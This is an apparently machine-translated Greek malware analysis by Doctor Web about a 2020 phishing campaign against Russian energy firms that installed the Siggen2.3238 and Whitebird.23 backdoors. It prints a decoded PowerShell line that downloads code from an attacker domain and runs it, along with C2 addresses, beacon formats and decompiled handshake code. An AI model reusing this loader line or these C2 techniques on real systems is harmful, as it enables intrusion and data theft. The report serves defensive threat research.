Η εμπειρία μας στη διερεύνηση περιστατικών ασφάλειας υπολογιστών δείχνει ότι το email εξακολουθεί να είναι ένα από τα πιο κοινά κανάλια που χρησιμοποιούνται από τους εισβολείς για να διεισδύσουν αρχικά σε υποδομές δικτύου που έχουν υποστεί επίθεση. Μια απρόσεκτη ενέργεια με μια ύποπτη (ή όχι τόσο ύποπτη) επιστολή γίνεται σημείο εισόδου για περαιτέρω μόλυνση, γι' αυτό οι εγκληματίες του κυβερνοχώρου χρησιμοποιούν ενεργά μεθόδους κοινωνικής μηχανικής, αν και με διάφορους βαθμούς επιτυχίας.
Σε αυτήν την ανάρτηση θέλουμε να μιλήσουμε για την πρόσφατη έρευνά μας σχετικά με μια εκστρατεία ανεπιθύμητης αλληλογραφίας που στοχεύει ορισμένες επιχειρήσεις στο ρωσικό συγκρότημα καυσίμων και ενέργειας. Όλες οι επιθέσεις ακολούθησαν το ίδιο σενάριο χρησιμοποιώντας ψεύτικα email και κανείς δεν φαινόταν να έχει καταβάλει μεγάλη προσπάθεια στο περιεχόμενο κειμένου αυτών των email.
Νοημοσύνη
Όλα ξεκίνησαν στα τέλη Απριλίου 2020, όταν οι αναλυτές του ιού Doctor Web εντόπισαν μια εκστρατεία ανεπιθύμητης αλληλογραφίας στην οποία χάκερ έστειλαν έναν ενημερωμένο τηλεφωνικό κατάλογο σε υπαλλήλους ορισμένων επιχειρήσεων στο ρωσικό συγκρότημα καυσίμων και ενέργειας. Φυσικά, αυτό δεν ήταν μια απλή εκδήλωση ανησυχίας, καθώς ο κατάλογος δεν ήταν πραγματικός και τα έγγραφα .docx κατέβασαν δύο εικόνες από απομακρυσμένους πόρους.
Ένα από αυτά έγινε λήψη στον υπολογιστή του χρήστη από τον διακομιστή news[.]zannews[.]com. Αξίζει να σημειωθεί ότι το όνομα τομέα είναι παρόμοιο με τον τομέα του κέντρου πολυμέσων κατά της διαφθοράς του Καζακστάν - zannews[.]kz. Από την άλλη πλευρά, ο τομέας που χρησιμοποιήθηκε θύμιζε αμέσως μια άλλη καμπάνια του 2015 γνωστή ως TOPNEWS, η οποία χρησιμοποιούσε μια κερκόπορτα ICEFOG και είχε τομείς ελέγχου Trojan με την υποσυμβολοσειρά «news» στα ονόματά τους. Ένα άλλο ενδιαφέρον χαρακτηριστικό ήταν ότι κατά την αποστολή email σε διαφορετικούς παραλήπτες, τα αιτήματα για λήψη μιας εικόνας χρησιμοποιούσαν είτε διαφορετικές παραμέτρους αιτήματος είτε μοναδικά ονόματα εικόνων.
Πιστεύουμε ότι αυτό έγινε με σκοπό τη συλλογή πληροφοριών για τον εντοπισμό ενός «αξιόπιστου» παραλήπτη, ο οποίος στη συνέχεια θα ήταν εγγυημένος ότι θα ανοίξει την επιστολή την κατάλληλη στιγμή. Το πρωτόκολλο SMB χρησιμοποιήθηκε για τη λήψη της εικόνας από τον δεύτερο διακομιστή, κάτι που θα μπορούσε να γίνει για τη συλλογή κατακερματισμών NetNTLM από τους υπολογιστές των υπαλλήλων που άνοιξαν το ληφθέν έγγραφο.
Και εδώ είναι το ίδιο το γράμμα με τον ψεύτικο κατάλογο:
Τον Ιούνιο του τρέχοντος έτους, οι χάκερ άρχισαν να χρησιμοποιούν ένα νέο όνομα τομέα, το sports[.]manhajnews[.]com, για να ανεβάζουν εικόνες. Η ανάλυση έδειξε ότι οι υποτομείς manhajnews[.]com χρησιμοποιούνται σε αποστολές ανεπιθύμητης αλληλογραφίας τουλάχιστον από τον Σεπτέμβριο του 2019. Ένας από τους στόχους αυτής της εκστρατείας ήταν ένα μεγάλο ρωσικό πανεπιστήμιο.
Επίσης, μέχρι τον Ιούνιο, οι διοργανωτές της επίθεσης κατέληξαν σε ένα νέο κείμενο για τις επιστολές τους: αυτή τη φορά το έγγραφο περιείχε πληροφορίες για την ανάπτυξη της βιομηχανίας. Το κείμενο της επιστολής έδειχνε ξεκάθαρα ότι ο συντάκτης του είτε δεν μιλούσε τη ρωσική γλώσσα στη μητρική του γλώσσα είτε δημιουργούσε εσκεμμένα μια τέτοια εντύπωση για τον εαυτό του. Δυστυχώς, οι ιδέες της ανάπτυξης της βιομηχανίας, όπως πάντα, αποδείχτηκαν απλώς ένα εξώφυλλο - το έγγραφο κατέβασε ξανά δύο εικόνες, ενώ ο διακομιστής άλλαξε σε λήψη[.]inklingpaper[.]com.
Η επόμενη καινοτομία ακολούθησε τον Ιούλιο. Σε μια προσπάθεια να παρακάμψουν τον εντοπισμό κακόβουλων εγγράφων από προγράμματα προστασίας από ιούς, οι εισβολείς άρχισαν να χρησιμοποιούν έγγραφα του Microsoft Word κρυπτογραφημένα με κωδικό πρόσβασης. Την ίδια στιγμή, οι επιτιθέμενοι αποφάσισαν να χρησιμοποιήσουν μια κλασική τεχνική κοινωνικής μηχανικής - ειδοποίηση ανταμοιβής.
Στο ίδιο ύφος γράφτηκε και πάλι το κείμενο της προσφυγής, γεγονός που προκάλεσε πρόσθετες υποψίες στον αποδέκτη. Ο διακομιστής για τη λήψη της εικόνας επίσης δεν άλλαξε.
Σημειώστε ότι σε όλες τις περιπτώσεις, ηλεκτρονικά γραμματοκιβώτια καταχωρημένα στους τομείς mail[.]ru και yandex[.]ru χρησιμοποιήθηκαν για την αποστολή επιστολών.
Επίθεση
Στις αρχές Σεπτεμβρίου 2020, ήρθε η ώρα για δράση. Οι αναλυτές μας για ιούς κατέγραψαν ένα νέο κύμα επιθέσεων, στο οποίο οι εισβολείς έστειλαν ξανά επιστολές με το πρόσχημα της ενημέρωσης τηλεφωνικού καταλόγου. Ωστόσο, αυτή τη φορά το συνημμένο περιείχε μια κακόβουλη μακροεντολή.
Κατά το άνοιγμα του συνημμένου εγγράφου, η μακροεντολή δημιούργησε δύο αρχεία:
- Σενάριο VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, το οποίο προοριζόταν για την εκκίνηση ενός αρχείου δέσμης.
- Το ίδιο το αρχείο δέσμης %APPDATA%configstest.bat, το οποίο ήταν ασαφές.
Η ουσία της δουλειάς του έγκειται στην εκτόξευση του κελύφους Powershell με ορισμένες παραμέτρους. Οι παράμετροι που μεταβιβάζονται στο κέλυφος αποκωδικοποιούνται σε εντολές:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Όπως προκύπτει από τις εντολές που παρουσιάζονται, ο τομέας από τον οποίο γίνεται λήψη του ωφέλιμου φορτίου μεταμφιέζεται και πάλι ως ιστότοπος ειδήσεων. Ενα απλό , του οποίου η μοναδική αποστολή είναι να λαμβάνει κώδικα shell από τον διακομιστή εντολών και ελέγχου και να τον εκτελεί. Καταφέραμε να εντοπίσουμε δύο τύπους κερκόπορτων που μπορούν να εγκατασταθούν στον υπολογιστή του θύματος.
BackDoor.Siggen2.3238
Το πρώτο είναι BackDoor.Siggen2.3238 — οι ειδικοί μας δεν είχαν συναντήσει πριν, και επίσης δεν υπήρχαν αναφορές για αυτό το πρόγραμμα από άλλους προμηθευτές προστασίας από ιούς.
Αυτό το πρόγραμμα είναι ένα backdoor γραμμένο σε C++ και τρέχει σε λειτουργικά συστήματα Windows 32-bit.
BackDoor.Siggen2.3238 είναι σε θέση να επικοινωνεί με τον διακομιστή διαχείρισης χρησιμοποιώντας δύο πρωτόκολλα: HTTP και HTTPS. Το δοκιμασμένο δείγμα χρησιμοποιεί το πρωτόκολλο HTTPS. Ο ακόλουθος παράγοντας χρήστη χρησιμοποιείται σε αιτήματα προς τον διακομιστή:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Σε αυτήν την περίπτωση, όλα τα αιτήματα παρέχονται με το ακόλουθο σύνολο παραμέτρων:
%s;type=%s;length=%s;realdata=%send
όπου κάθε γραμμή %s αντικαθίσταται αντίστοιχα από:
- Ταυτότητα του μολυσμένου υπολογιστή,
- τύπος αιτήματος που αποστέλλεται,
- μήκος δεδομένων στο πεδίο realdata,
- δεδομένων.
Στο στάδιο της συλλογής πληροφοριών σχετικά με το μολυσμένο σύστημα, η κερκόπορτα δημιουργεί μια γραμμή όπως:
lan=%s;cmpname=%s;username=%s;version=%s;
όπου lan είναι η διεύθυνση IP του μολυσμένου υπολογιστή, cmpname είναι το όνομα υπολογιστή, όνομα χρήστη είναι το όνομα χρήστη, έκδοση είναι η γραμμή 0.0.4.03.
Αυτές οι πληροφορίες με το αναγνωριστικό sysinfo αποστέλλονται μέσω αιτήματος POST στον διακομιστή ελέγχου που βρίσκεται στη διεύθυνση https[:]//31.214[.]157.14/log.txt. Αν σε απάντηση BackDoor.Siggen2.3238 λαμβάνει το σήμα HEART, η σύνδεση θεωρείται επιτυχής και η κερκόπορτα ξεκινά τον κύριο κύκλο επικοινωνίας με τον διακομιστή.
Πιο πλήρης περιγραφή των αρχών λειτουργίας BackDoor.Siggen2.3238 είναι στο δικό μας .
BackDoor.Whitebird.23
Το δεύτερο πρόγραμμα είναι μια τροποποίηση του BackDoor.Whitebird backdoor, ήδη γνωστό σε εμάς από το περιστατικό με μια κυβερνητική υπηρεσία στο Καζακστάν. Αυτή η έκδοση είναι γραμμένη σε C++ και έχει σχεδιαστεί για να εκτελείται σε λειτουργικά συστήματα Windows 32-bit και 64-bit.
Όπως τα περισσότερα προγράμματα αυτού του τύπου, BackDoor.Whitebird.23 έχει σχεδιαστεί για τη δημιουργία κρυπτογραφημένης σύνδεσης με τον διακομιστή ελέγχου και μη εξουσιοδοτημένο έλεγχο ενός μολυσμένου υπολογιστή. Εγκαταστάθηκε σε ένα παραβιασμένο σύστημα χρησιμοποιώντας ένα σταγονόμετρο .
Το δείγμα που εξετάσαμε ήταν μια κακόβουλη βιβλιοθήκη με δύο εξαγωγές:
- Google Play
- Test.
Στην αρχή της εργασίας του, αποκρυπτογραφεί τη διαμόρφωση ενσωματωμένη στο σώμα της κερκόπορτας χρησιμοποιώντας έναν αλγόριθμο που βασίζεται στη λειτουργία XOR με byte 0x99. Η διαμόρφωση μοιάζει με:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Για να διασφαλιστεί η συνεχής λειτουργία της, η κερκόπορτα αλλάζει την τιμή που καθορίζεται στο πεδίο ώρες εργασίας διαμορφώσεις. Το πεδίο περιέχει 1440 byte, τα οποία λαμβάνουν τις τιμές 0 ή 1 και αντιπροσωπεύουν κάθε λεπτό κάθε ώρας της ημέρας. Δημιουργεί ένα ξεχωριστό νήμα για κάθε διεπαφή δικτύου που ακούει τη διεπαφή και αναζητά πακέτα εξουσιοδότησης στον διακομιστή μεσολάβησης από τον μολυσμένο υπολογιστή. Όταν εντοπιστεί ένα τέτοιο πακέτο, η κερκόπορτα προσθέτει πληροφορίες σχετικά με τον διακομιστή μεσολάβησης στη λίστα του. Επιπλέον, ελέγχει την παρουσία διακομιστή μεσολάβησης μέσω WinAPI InternetQueryOptionW.
Το πρόγραμμα ελέγχει τα τρέχοντα λεπτά και ώρα και τα συγκρίνει με τα δεδομένα στο πεδίο ώρες εργασίας διαμορφώσεις. Εάν η τιμή για το αντίστοιχο λεπτό της ημέρας δεν είναι μηδέν, τότε δημιουργείται σύνδεση με τον διακομιστή ελέγχου.
Η δημιουργία μιας σύνδεσης με τον διακομιστή προσομοιώνει τη δημιουργία μιας σύνδεσης χρησιμοποιώντας το πρωτόκολλο TLS έκδοσης 1.0 μεταξύ του πελάτη και του διακομιστή. Το σώμα της πίσω πόρτας περιέχει δύο buffers.
Το πρώτο buffer περιέχει το πακέτο TLS 1.0 Client Hello.
Το δεύτερο buffer περιέχει πακέτα ανταλλαγής κλειδιών πελάτη TLS 1.0 με μήκος κλειδιού 0x100 byte, Change Cipher Spec, Encrypted Handshake Message.
Κατά την αποστολή ενός πακέτου Client Hello, η κερκόπορτα γράφει 4 byte της τρέχουσας ώρας και 28 byte ψευδοτυχαίων δεδομένων στο πεδίο Client Random, που υπολογίζονται ως εξής:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Το ληφθέν πακέτο αποστέλλεται στον διακομιστή ελέγχου. Η απάντηση (πακέτο Server Hello) ελέγχει:
- συμμόρφωση με το πρωτόκολλο TLS έκδοση 1.0.
- αντιστοιχία της χρονικής σφραγίδας (τα πρώτα 4 byte του πεδίου πακέτου Random Data) που καθορίζεται από τον πελάτη με τη χρονική σήμανση που καθορίζεται από τον διακομιστή.
- αντιστοίχιση των πρώτων 4 byte μετά τη χρονική σήμανση στο πεδίο Random Data του πελάτη και του διακομιστή.
Στην περίπτωση των καθορισμένων αντιστοιχιών, το backdoor προετοιμάζει ένα πακέτο Client Key Exchange. Για να γίνει αυτό, τροποποιεί το Δημόσιο Κλειδί στο πακέτο Client Key Exchange, καθώς και τα Encryption IV και Encryption Data στο πακέτο Encrypted Handshake Message.
Στη συνέχεια, η κερκόπορτα λαμβάνει το πακέτο από τον διακομιστή εντολών και ελέγχου, ελέγχει ότι η έκδοση του πρωτοκόλλου TLS είναι 1.0 και, στη συνέχεια, δέχεται άλλα 54 byte (το σώμα του πακέτου). Αυτό ολοκληρώνει τη ρύθμιση της σύνδεσης.
Πιο πλήρης περιγραφή των αρχών λειτουργίας BackDoor.Whitebird.23 είναι στο δικό μας .
Συμπέρασμα και συμπεράσματα
Η ανάλυση των εγγράφων, του κακόβουλου λογισμικού και της υποδομής που χρησιμοποιήθηκε μας επιτρέπει να πούμε με σιγουριά ότι η επίθεση προετοιμάστηκε από μία από τις κινεζικές ομάδες APT. Λαμβάνοντας υπόψη τη λειτουργικότητα των backdoors που εγκαθίστανται στους υπολογιστές των θυμάτων σε περίπτωση επιτυχούς επίθεσης, η μόλυνση οδηγεί, τουλάχιστον, στην κλοπή εμπιστευτικών πληροφοριών από τους υπολογιστές των οργανισμών που δέχονται επίθεση.
Επιπλέον, ένα πολύ πιθανό σενάριο είναι η εγκατάσταση εξειδικευμένων Trojans σε τοπικούς διακομιστές με ειδική λειτουργία. Αυτοί θα μπορούσαν να είναι ελεγκτές τομέα, διακομιστές αλληλογραφίας, πύλες Internet, κ.λπ. Όπως θα μπορούσαμε να δούμε στο παράδειγμα , τέτοιοι διακομιστές παρουσιάζουν ιδιαίτερο ενδιαφέρον για τους εισβολείς για διάφορους λόγους.
Πηγή: www.habr.com